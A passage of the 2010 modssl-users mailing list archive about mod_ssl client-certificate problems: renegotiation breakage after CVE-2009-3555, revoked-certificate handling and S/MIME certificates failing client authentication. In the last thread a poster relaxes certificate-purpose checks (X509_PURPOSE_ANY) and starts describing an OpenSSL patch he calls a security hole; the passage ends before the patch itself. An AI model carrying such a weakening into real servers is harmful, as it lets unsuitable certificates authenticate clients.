directory are not listed.

In Wireshark, I see a client hello, followed by a server hello, followed
by a change cipher spec, presumably because I was never prompted for an
identification certificate by the server within a set time.

In the "good" case, when my "SSLVerifyClient require" statement is in the
VirtualHost section of the ssl.conf file, in Wireshark, I see a client
hello, followed by a server hello, followed by a "certificate, server key
exchange, certificate request", which seems to be where the window pops up
in my client prompting me with a user identification request.

In trying to debug this, I noticed that if I do a hack and revert back to
an earlier RPM version of openssl, openssl-0.9.8g-11.fc10.i386.rpm, that
both configurations (per-server and per-directory contexts) work as
expected.  What might be wrong here?

Aaron


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan 20 07:15:05 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 50F6714DA4C; Wed, 20 Jan 2010 07:15:05 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from smtp4.tech.numericable.fr (smtp4.tech.numericable.fr [82.216.111.40])
	by master.modssl.org (Postfix) with ESMTP id CBF2E14D839
	for ; Wed, 20 Jan 2010 07:14:48 +0100 (CET)
Received: from genki.phocean.net (89-159-121-109.rev.dartybox.com [89.159.121.109])
	by smtp4.tech.numericable.fr (Postfix) with ESMTP id 3679412A80E
	for ; Wed, 20 Jan 2010 07:12:37 +0100 (CET)
Received: from localhost (localhost [127.0.0.1])
	by genki.phocean.net (Postfix) with ESMTP id BE9966006D
	for ; Wed, 20 Jan 2010 07:12:36 +0100 (CET)
X-Virus-Scanned: amavisd-new at phocean.net
Received: from genki.phocean.net ([127.0.0.1])
	by localhost (genki.phocean.net [127.0.0.1]) (amavisd-new, port 10024)
	with ESMTP id ysmAMj5q4reh for ;
	Wed, 20 Jan 2010 07:12:36 +0100 (CET)
Received: from [192.168.222.9] (89-159-121-109.rev.dartybox.com [89.159.121.109])
	(using TLSv1 with cipher DHE-RSA-CAMELLIA256-SHA (256/256 bits))
	(No client certificate requested)
	by genki.phocean.net (Postfix) with ESMTPSA id 74ED860045
	for ; Wed, 20 Jan 2010 07:12:36 +0100 (CET)
Subject: Re: SSLVerifyClient require per directory context
From: Jean-Christophe Baptiste 
To: modssl-users@modssl.org
In-Reply-To: 
References: 
Content-Type: multipart/signed; micalg="pgp-sha1"; protocol="application/pgp-signature"; boundary="=-qNtIamD/cwzegWUj1t/O"
Date: Wed, 20 Jan 2010 07:12:29 +0100
Message-Id: <1263967949.16130.5.camel@thinkpad.phocean>
Mime-Version: 1.0
X-Mailer: Evolution 2.28.0 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jean-Christophe Baptiste 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


--=-qNtIamD/cwzegWUj1t/O
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: quoted-printable

Hello,

I faced the same issue.
Actually, client authentication has been disabled on recent versions. It
has nothing to do with your configuration.

See (on my blog):
http://www.phocean.net/2009/11/28/openssl-cve-2009-3555-security-fix-and-mo=
d_ssl-client-authentication-breakage.html
and then :
http://www.phocean.net/2010/01/09/ssltls-rfc-updated-against-cve-2009-3555.=
html

Regards,

--=20
Jean-Christophe Baptiste 


Le mardi 19 janvier 2010 =C3=A0 16:53 -0600, aaron@cs.wisc.edu a =C3=A9crit=
 :
> I'm trying to go through the most basic tutorials on mod_ssl and I'm
> having a problem trying to get my server to issue a certificate request
> for a particular URL.  I'm listing my Apache and OpenSSL version
> information.
>=20
> # httpd -v
> Server version: Apache/2.2.14 (Unix)
> Server built:   Dec  3 2009 10:25:53
>=20
> # openssl version
> OpenSSL 1.0.0-fips-beta4 10 Nov 2009
>=20
> I've followed the steps of this tutorial:
>=20
> http://www.vanemery.com/Linux/Apache/apache-SSL.html
>=20
> I've also tried to follow the SSL HowTo on the Apache site:
>=20
> http://httpd.apache.org/docs/2.2/ssl/ssl_howto.html
>=20
> I'll try to get at the heart of the issue.  If I have the following in my
> ssl.conf file in the VirtualHost section
>=20
> SSLVerifyClient require
> SSLVerifyDepth 1
>=20
> then everything works as expected.  I have the client certificate
> installed in my client web browser, and when I click on the link to my
> https server, which is https://myserver, then it prompts me to get the
> certificate of the server and confirm a security exception, and also
> prompts me with a user identification request, at which point I can chose
> a certificate to identify the client to my server.  I see my index.html
> page, which has a link to the directory https://myserver/Certneeded.  I
> can click on this directory and see a list of the files in that directory=
.
>=20
> However, if I change my ssl.conf in an attempt to "force clients to
> authenticate using certificates for a particular URL, but still allow
> arbitrary clients to access the rest of the server", as per the Apache
> HowTo, then I never get prompted for this "user identification request" t=
o
> which I can identify my client web browser to the server.
>=20
> In this case, my ssl.conf file changes to the following.
>=20
> SSLVerifyClient none
> 
>         Options Indexes
>         SSLVerifyClient require
>         SSLVerifyDepth 1
> 
>=20
> Now, when I click on the link to https://myserver/Certneeded, the client
> browser just hangs until a timeout is reached, I'm never prompted to
> present a certificate for identification, and the contents of the
> directory are not listed.
>=20
> In Wireshark, I see a client hello, followed by a server hello, followed
> by a change cipher spec, presumably because I was never prompted for an
> identification certificate by the server within a set time.
>=20
> In the "good" case, when my "SSLVerifyClient require" statement is in the
> VirtualHost section of the ssl.conf file, in Wireshark, I see a client
> hello, followed by a server hello, followed by a "certificate, server key
> exchange, certificate request", which seems to be where the window pops u=
p
> in my client prompting me with a user identification request.
>=20
> In trying to debug this, I noticed that if I do a hack and revert back to
> an earlier RPM version of openssl, openssl-0.9.8g-11.fc10.i386.rpm, that
> both configurations (per-server and per-directory contexts) work as
> expected.  What might be wrong here?
>=20
> Aaron
>=20
>=20
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

--=-qNtIamD/cwzegWUj1t/O
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: Ceci est une partie de message
 =?ISO-8859-1?Q?num=E9riquement?= =?ISO-8859-1?Q?_sign=E9e?=

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.12 (GNU/Linux)

iQIcBAABAgAGBQJLVp7MAAoJEEElXOw26xO+u0AP/3Vls+98Y+wfinIxnOvAtD2O
JKSXS8hUQz7LufDNizNF4W84NWFGt2M7/2xOc6Lgoe1uvy7VUKwFJNJFSHlgebVA
7mVCRbjTecsdzSu1HgD/2RR9u7fmU9tUfBEg+5XZM12s6ZY9qrOgWznkbIQbf5Sa
pythvZuf7yCqfnECtPIr/NOiWE0Gdl/MYYrijPDKwcRQjPtVzcVHJwsxBLzZNnmQ
pXHWIi31zYCA0UoU+mk0Q4GgqpBBVjF52pBeOuPEMLlC9LWQahxVN1vURUmOOL4/
DZRdvUmeqNvut3T4hOSeDr/ig2G8K/VxpOQGzctHZuIjkcca2anUsOum1hzzTfj3
Xs9Ir+GLDj43BfOza5z22Wnr+MxHmHSFuYeKMa1GMj7Nd+QlKaQdS6YtTAabl7fv
xaSNwJZ60y19HOR8uSBRr5XH27YBpGVh25+QMVM3CTKG2goMg1PhmVstlbDksQhZ
cXb/6jwyidneJNcmeQHhGeeIxecZdeDidlHCqht+HdqQ7PxDzXCyhhqGypnQd92Q
hUWZqU/JWCMNEXHxdkoMHd6zuDSj5+xKoQgoiDLZFPjcDhxiPpBPg1rCIQZUtXYJ
990YaelJ9nQlwoMibNFJoOs2LxEmuOe3Zc7KpBBwqx7fl+3OwFH3b6XnP84c3w9P
tKRoVcqno1OTr+ZwXdI8
=2W8O
-----END PGP SIGNATURE-----

--=-qNtIamD/cwzegWUj1t/O--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan 20 17:33:26 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6CBDA14DA35; Wed, 20 Jan 2010 17:33:26 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from sandstone.cs.wisc.edu (sandstone.cs.wisc.edu [128.105.6.39])
	by master.modssl.org (Postfix) with ESMTP id D649D14D839
	for ; Wed, 20 Jan 2010 17:33:09 +0100 (CET)
Received: from webmail.cs.wisc.edu (skippy.cs.wisc.edu [128.105.7.38])
	by sandstone.cs.wisc.edu (8.14.1/8.14.1) with ESMTP id o0KGUvBj010608
	for ; Wed, 20 Jan 2010 10:30:58 -0600
Received: from 74.253.161.42
        (SquirrelMail authenticated user aaron)
        by webmail.cs.wisc.edu with HTTP;
        Wed, 20 Jan 2010 10:30:58 -0600
Message-ID: <98efbede30ffe2a6407a286cc945b2bc.squirrel@webmail.cs.wisc.edu>
In-Reply-To: <1263967949.16130.5.camel@thinkpad.phocean>
References: 
    <1263967949.16130.5.camel@thinkpad.phocean>
Date: Wed, 20 Jan 2010 10:30:58 -0600
Subject: Re: SSLVerifyClient require per directory context
From: aaron@cs.wisc.edu
To: modssl-users@modssl.org
User-Agent: SquirrelMail/1.4.19
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: aaron@cs.wisc.edu
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Thanks so much for your tip.  Now I have a much better understanding of
the problem.

Aaron

> Hello,
>
> I faced the same issue.
> Actually, client authentication has been disabled on recent versions. It
> has nothing to do with your configuration.
>
> See (on my blog):
> http://www.phocean.net/2009/11/28/openssl-cve-2009-3555-security-fix-and-mod_ssl-client-authentication-breakage.html
> and then :
> http://www.phocean.net/2010/01/09/ssltls-rfc-updated-against-cve-2009-3555.html
>
> Regards,
>
> --
> Jean-Christophe Baptiste 
>
>
> Le mardi 19 janvier 2010 à 16:53 -0600, aaron@cs.wisc.edu a écrit :
>> I'm trying to go through the most basic tutorials on mod_ssl and I'm
>> having a problem trying to get my server to issue a certificate request
>> for a particular URL.  I'm listing my Apache and OpenSSL version
>> information.
>>
>> # httpd -v
>> Server version: Apache/2.2.14 (Unix)
>> Server built:   Dec  3 2009 10:25:53
>>
>> # openssl version
>> OpenSSL 1.0.0-fips-beta4 10 Nov 2009
>>
>> I've followed the steps of this tutorial:
>>
>> http://www.vanemery.com/Linux/Apache/apache-SSL.html
>>
>> I've also tried to follow the SSL HowTo on the Apache site:
>>
>> http://httpd.apache.org/docs/2.2/ssl/ssl_howto.html
>>
>> I'll try to get at the heart of the issue.  If I have the following in
>> my
>> ssl.conf file in the VirtualHost section
>>
>> SSLVerifyClient require
>> SSLVerifyDepth 1
>>
>> then everything works as expected.  I have the client certificate
>> installed in my client web browser, and when I click on the link to my
>> https server, which is https://myserver, then it prompts me to get the
>> certificate of the server and confirm a security exception, and also
>> prompts me with a user identification request, at which point I can
>> chose
>> a certificate to identify the client to my server.  I see my index.html
>> page, which has a link to the directory https://myserver/Certneeded.  I
>> can click on this directory and see a list of the files in that
>> directory.
>>
>> However, if I change my ssl.conf in an attempt to "force clients to
>> authenticate using certificates for a particular URL, but still allow
>> arbitrary clients to access the rest of the server", as per the Apache
>> HowTo, then I never get prompted for this "user identification request"
>> to
>> which I can identify my client web browser to the server.
>>
>> In this case, my ssl.conf file changes to the following.
>>
>> SSLVerifyClient none
>> 
>>         Options Indexes
>>         SSLVerifyClient require
>>         SSLVerifyDepth 1
>> 
>>
>> Now, when I click on the link to https://myserver/Certneeded, the client
>> browser just hangs until a timeout is reached, I'm never prompted to
>> present a certificate for identification, and the contents of the
>> directory are not listed.
>>
>> In Wireshark, I see a client hello, followed by a server hello, followed
>> by a change cipher spec, presumably because I was never prompted for an
>> identification certificate by the server within a set time.
>>
>> In the "good" case, when my "SSLVerifyClient require" statement is in
>> the
>> VirtualHost section of the ssl.conf file, in Wireshark, I see a client
>> hello, followed by a server hello, followed by a "certificate, server
>> key
>> exchange, certificate request", which seems to be where the window pops
>> up
>> in my client prompting me with a user identification request.
>>
>> In trying to debug this, I noticed that if I do a hack and revert back
>> to
>> an earlier RPM version of openssl, openssl-0.9.8g-11.fc10.i386.rpm, that
>> both configurations (per-server and per-directory contexts) work as
>> expected.  What might be wrong here?
>>
>> Aaron
>>
>>
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 22 16:13:24 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5D36E14DA25; Fri, 22 Jan 2010 16:13:24 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from gateway10.websitewelcome.com (gateway10.websitewelcome.com [67.18.1.14])
	by master.modssl.org (Postfix) with SMTP id C16B514D838
	for ; Fri, 22 Jan 2010 16:13:07 +0100 (CET)
Received: (qmail 11726 invoked from network); 22 Jan 2010 15:10:56 -0000
Received: from alto.websitewelcome.com (74.53.104.194)
  by gateway10.websitewelcome.com with SMTP; 22 Jan 2010 15:10:56 -0000
Received: from c-24-60-203-104.hsd1.ma.comcast.net ([24.60.203.104]:1996 helo=hostgator)
	by alto.websitewelcome.com with esmtpsa (SSLv3:AES256-SHA:256)
	(Exim 4.69)
	(envelope-from )
	id 1NYL9u-0008Pl-Nt
	for modssl-users@modssl.org; Fri, 22 Jan 2010 09:10:50 -0600
Received: from localhost ([127.0.0.1])
	by hostgator
	; Fri, 22 Jan 2010 10:10:37 -0500
MIME-Version: 1.0
Date: Fri, 22 Jan 2010 10:10:37 -0500
From: Jaz 
To: modssl-users@modssl.org
Subject: SSLVerifyClient optional redirect or be graceful upon revoked certificate
Organization: MITLL
Message-ID: <7ece93ecf365857e4988bd5fe413b2ce@localhost>
X-Sender: koolaid@bonbon.net
User-Agent: RoundCube Webmail/0.1b
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - alto.websitewelcome.com
X-AntiAbuse: Original Domain - modssl.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - bonbon.net
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jaz 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

When using "SSLVerifyClient optional" is there a way (or are there plans for this) to redirect when mod_ssl detects a revoked certificate? What about setting $_SERVER["SSL_CLIENT_VERIFY"] == "FAIL" just as it is when no certificate is installed? In other words, why should the action be any different for no-certificate and revoked-certificate?

BTW, my application is a wrapper app to self manage private SSL certificates. The login pre-test is intended for all cases (without cert, with cert, and revoked cert) and detects by testing $_SERVER["SSL_CLIENT_VERIFY"] == "SUCCESS" (This is in a dedicated directory  carefully designed to eliminate risk from MitM attacks). This works for the two cases no-cert & valid-cert, but for revoke-cert we get an ugly hard-stop. For example from Firefox: "SSL peer rejected your certificate as revoked".

If this isn't appropriate for modssl-users, is rather an apache issue, then advice for an alternate forum is appreciated. Has it already been discussed/requested? (searched a lot but didn't find anything)

I would like to build a mod_ssl with both the option to redirect on FAIL (separate options for no-cert and revoked-cert), and limit initiate-renegotiation only by server, not by client. Any help is greatly appreciated.

Thanks. 




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 22 18:59:46 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 511F214DA58; Fri, 22 Jan 2010 18:59:46 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mail.npubs.com (mail.npubs.com [74.82.45.72])
	by master.modssl.org (Postfix) with ESMTP id B476F14DA55
	for ; Fri, 22 Jan 2010 18:59:29 +0100 (CET)
Received: from mail.npubs.com (blocker.npubs.com [74.82.45.71])
	by mail.npubs.com (Postfix) with ESMTP id 1415B2455D5
	for ; Fri, 22 Jan 2010 17:57:18 +0000 (UTC)
Received: from (Authenticated sender: mailgate)
	by mail.npubs.com (Postfix) with ESMTPA id CA9C72455D1
	for ; Fri, 22 Jan 2010 17:57:16 +0000 (UTC)
From: "Peter" 
To: 
References: <7ece93ecf365857e4988bd5fe413b2ce@localhost>
Subject: RE: SSLVerifyClient optional redirect or be graceful upon revoked certificate
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft Office Outlook 11
X-MimeOLE: Produced By Microsoft MimeOLE V6.1.7600.16385
Thread-Index: AcqbdTZr5g1fJMG7QW2ZDcevcL/qxwAEmYYA
X-Virus-Scanned: ClamAV using ClamSMTP
Message-Id: <20100122175945.B476F14DA55@master.modssl.org>
Date: Fri, 22 Jan 2010 18:59:29 +0100 (CET)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I proposed this a while back but never got any responses.

https://issues.apache.org/bugzilla/show_bug.cgi?id=46897

-----Original Message-----
From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]
On Behalf Of Jaz
Sent: Friday, January 22, 2010 9:11 AM
To: modssl-users@modssl.org
Subject: SSLVerifyClient optional redirect or be graceful upon revoked
certificate

When using "SSLVerifyClient optional" is there a way (or are there plans for
this) to redirect when mod_ssl detects a revoked certificate? What about
setting $_SERVER["SSL_CLIENT_VERIFY"] == "FAIL" just as it is when no
certificate is installed? In other words, why should the action be any
different for no-certificate and revoked-certificate?

BTW, my application is a wrapper app to self manage private SSL
certificates. The login pre-test is intended for all cases (without cert,
with cert, and revoked cert) and detects by testing
$_SERVER["SSL_CLIENT_VERIFY"] == "SUCCESS" (This is in a dedicated directory
 carefully designed to eliminate risk from MitM attacks).
This works for the two cases no-cert & valid-cert, but for revoke-cert we
get an ugly hard-stop. For example from Firefox: "SSL peer rejected your
certificate as revoked".

If this isn't appropriate for modssl-users, is rather an apache issue, then
advice for an alternate forum is appreciated. Has it already been
discussed/requested? (searched a lot but didn't find anything)

I would like to build a mod_ssl with both the option to redirect on FAIL
(separate options for no-cert and revoked-cert), and limit
initiate-renegotiation only by server, not by client. Any help is greatly
appreciated.

Thanks. 




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb  5 13:21:14 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id CBC5814DA43; Fri,  5 Feb 2010 13:21:14 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from brest.ifremer.fr (brest.ifremer.fr [134.246.155.1])
	by master.modssl.org (Postfix) with ESMTP id 7C02414D836
	for ; Fri,  5 Feb 2010 13:21:14 +0100 (CET)
Received: from brehat.ifremer.fr (brehat [134.246.166.1])
	by brest.ifremer.fr (8.13.4/8.12.8) with ESMTP id o15CJ3gR015464
	for ; Fri, 5 Feb 2010 13:19:03 +0100 (MET)
Received: from localhost (localhost.localdomain [127.0.0.1])
	by brehat.ifremer.fr (Postfix) with ESMTP id B3A4C29379F
	for ; Fri,  5 Feb 2010 13:19:03 +0100 (CET)
X-Virus-Scanned: amavisd-new at ifremer.fr
Received: from brehat.ifremer.fr ([127.0.0.1])
	by localhost (brehat.ifremer.fr [127.0.0.1]) (amavisd-new, port 10024)
	with ESMTP id 4ZK+CiNIpjqX for ;
	Fri,  5 Feb 2010 13:19:03 +0100 (CET)
Received: from [127.0.0.1] (br167-198.ifremer.fr [134.246.167.198])
	by brehat.ifremer.fr (Postfix) with ESMTP id 8F29529378C
	for ; Fri,  5 Feb 2010 13:19:03 +0100 (CET)
Message-ID: <4B6C0CB6.3030708@ifremer.fr>
Date: Fri, 05 Feb 2010 13:19:02 +0100
From: Bernard PREVOSTO 
Organization: IFREMER
User-Agent: Thunderbird 2.0.0.23 (Windows/20090812)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: mod ssl's update for apache 1.3.42?
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Bernard PREVOSTO 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

The Apache Group is pleased to announce the legacy release of the 1.3.42 version of the Apache HTTP 
Server.

This version of Apache is principally a security release.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb  5 19:47:13 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E5D6B14DA3C; Fri,  5 Feb 2010 19:47:13 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from smtpauth17.prod.mesa1.secureserver.net (smtpauth17.prod.mesa1.secureserver.net [64.202.165.29])
	by master.modssl.org (Postfix) with SMTP id 2CBBC14D836
	for ; Fri,  5 Feb 2010 19:46:56 +0100 (CET)
Received: (qmail 22326 invoked from network); 5 Feb 2010 18:44:30 -0000
Received: from unknown (76.252.112.72)
  by smtpauth17.prod.mesa1.secureserver.net (64.202.165.29) with ESMTP; 05 Feb 2010 18:44:29 -0000
Message-ID: <4B6C670C.6000606@rowe-clan.net>
Date: Fri, 05 Feb 2010 12:44:28 -0600
From: "William A. Rowe Jr." 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.7) Gecko/20100111 Lightning/1.0b1 Thunderbird/3.0.1
MIME-Version: 1.0
To: modssl-users@modssl.org
CC: Bernard PREVOSTO 
Subject: Re: mod ssl's update for apache 1.3.42?
References: <4B6C0CB6.3030708@ifremer.fr>
In-Reply-To: <4B6C0CB6.3030708@ifremer.fr>
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "William A. Rowe Jr." 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I wouldn't expect an update until it's in sync with the final 0.9.8m from
the group, as a (probably final) update.  Without 0.9.8m finished, due to
an unfinished RFC, it's a bit trickier to move ahead.


On 2/5/2010 6:19 AM, Bernard PREVOSTO wrote:
> The Apache Group is pleased to announce the legacy release of the 1.3.42
> version of the Apache HTTP Server.
> 
> This version of Apache is principally a security release.
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 11 13:46:09 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 341C714DA5A; Thu, 11 Feb 2010 13:46:09 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mail.comodo.od.ua (mail.comodo.od.ua [91.196.95.17])
	by master.modssl.org (Postfix) with ESMTP id CBF3714D870
	for ; Thu, 11 Feb 2010 13:45:52 +0100 (CET)
Received: by mail.comodo.od.ua (Postfix, from userid 502)
	id E58B4C39FCB; Thu, 11 Feb 2010 14:43:41 +0200 (EET)
X-Spam-Checker-Version: SpamAssassin 3.2.5 (2008-06-10) on mail.comodo.od.ua
X-Spam-Level: 
X-Spam-Status: No, score=-0.4 required=5.0 tests=ALL_TRUSTED,AWL,
	FH_DATE_PAST_20XX autolearn=no version=3.2.5
Received: from [192.168.70.187] (ypogrebnyak.psoftod [192.168.70.187])
	by mail.comodo.od.ua (Postfix) with ESMTP id 7DCAFC39FC0
	for ; Thu, 11 Feb 2010 14:43:41 +0200 (EET)
Message-ID: <4B73FB80.3030406@comodo.od.ua>
Date: Thu, 11 Feb 2010 14:43:44 +0200
From: Yaroslav 
User-Agent: Thunderbird 2.0.0.23 (X11/20090817)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Client Auth with S/MIME certificates - certificate purpose problem
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Yaroslav 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi all!

I have an https server with apache/2.2.12+mod_ssl/2.2.14 and OpenSSL/0.9.8g.
I want to perform authentication based on client S/MIME certificates.
Clients have certificates with only the following purposes:
- S/MIME signing
- S/MIME encryption
But no SSL client or SSL server.

So I'm getting the following error while authentication:

...
[Wed Feb 10 11:36:59 2010] [error] [client 127.0.0.1] Certificate 
Verification: Error (26): unsupported certificate purpose
[Wed Feb 10 11:36:59 2010] [debug] ssl_engine_kernel.c(1893): OpenSSL: 
Write: SSLv3 read client certificate B
[Wed Feb 10 11:36:59 2010] [debug] ssl_engine_kernel.c(1912): OpenSSL: 
Exit: error in SSLv3 read client certificate B
[Wed Feb 10 11:36:59 2010] [debug] ssl_engine_kernel.c(1912): OpenSSL: 
Exit: error in SSLv3 read client certificate B
[Wed Feb 10 11:36:59 2010] [info] [client 127.0.0.1] SSL library error 1 
in handshake (server 127.0.1.1:443)
[Wed Feb 10 11:36:59 2010] [info] SSL Library Error: 336105650 
error:140890B2:SSL routines:SSL3_GET_CLIENT_CERTIFICATE:no certificate 
returned
...

I tried to solve this by customizing 'ssl_engine_init.c' from mod_ssl.
I added the following lines in ssl_init_ctx_verify function:

/*
  *  Configure CTX purpose
  */
if (SSL_CTX_set_purpose(ctx, X509_PURPOSE_ANY) {
    ap_log_error(APLOG_MARK, APLOG_DEBUG, 0, s,
       "Purpose successfully set");
} else {
    ap_log_error(APLOG_MARK, APLOG_DEBUG, 0, s, "Purpose set failed");
}

  /*
   * Configure Client Authentication details
   */

    But it doesn't work. Seems like it's all ok with SSL_CTX_set_purpose 
function and there is "Purpose successfully set" line in apache log file 
but I'm still getting "unsupported certificate purpose" error.
    I haven't found any certificate purpose configuration code in 
mod_ssl source.

I will be grateful for any help.


Yaroslav



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb 12 14:38:10 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 454EC14DA27; Fri, 12 Feb 2010 14:38:10 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mail.comodo.od.ua (mail.comodo.od.ua [91.196.95.17])
	by master.modssl.org (Postfix) with ESMTP id F18B914D838
	for ; Fri, 12 Feb 2010 14:37:52 +0100 (CET)
Received: by mail.comodo.od.ua (Postfix, from userid 502)
	id 91FDCC39FDA; Fri, 12 Feb 2010 15:35:41 +0200 (EET)
X-Spam-Checker-Version: SpamAssassin 3.2.5 (2008-06-10) on mail.comodo.od.ua
X-Spam-Level: 
X-Spam-Status: No, score=-0.2 required=5.0 tests=ALL_TRUSTED,AWL,
	FH_DATE_PAST_20XX autolearn=no version=3.2.5
Received: from [192.168.70.187] (ypogrebnyak.psoftod [192.168.70.187])
	by mail.comodo.od.ua (Postfix) with ESMTP id 481DFC39FCB
	for ; Fri, 12 Feb 2010 15:35:41 +0200 (EET)
Message-ID: <4B755930.9030901@comodo.od.ua>
Date: Fri, 12 Feb 2010 15:35:44 +0200
From: Yaroslav 
User-Agent: Thunderbird 2.0.0.23 (X11/20090817)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Client Auth with S/MIME certificates - certificate purpose problem
References: <4B73FB80.3030406@comodo.od.ua>
In-Reply-To: <4B73FB80.3030406@comodo.od.ua>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Yaroslav 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I found a solution, it looks like a dirty hack and making a security 
hole, but it works for our custom purposes. So I don't recommend to use 
this way. Somehow it may be interested for somebody.
It's needed to patch openssl.
In 'openssl/ssl/ssl_cert.c' file, in 'ssl_verify_cert_chain' function
replace

X509_STORE_CTX_set_default(&ctx,
           s->server ? "ssl_client" : "ssl_server");

  by

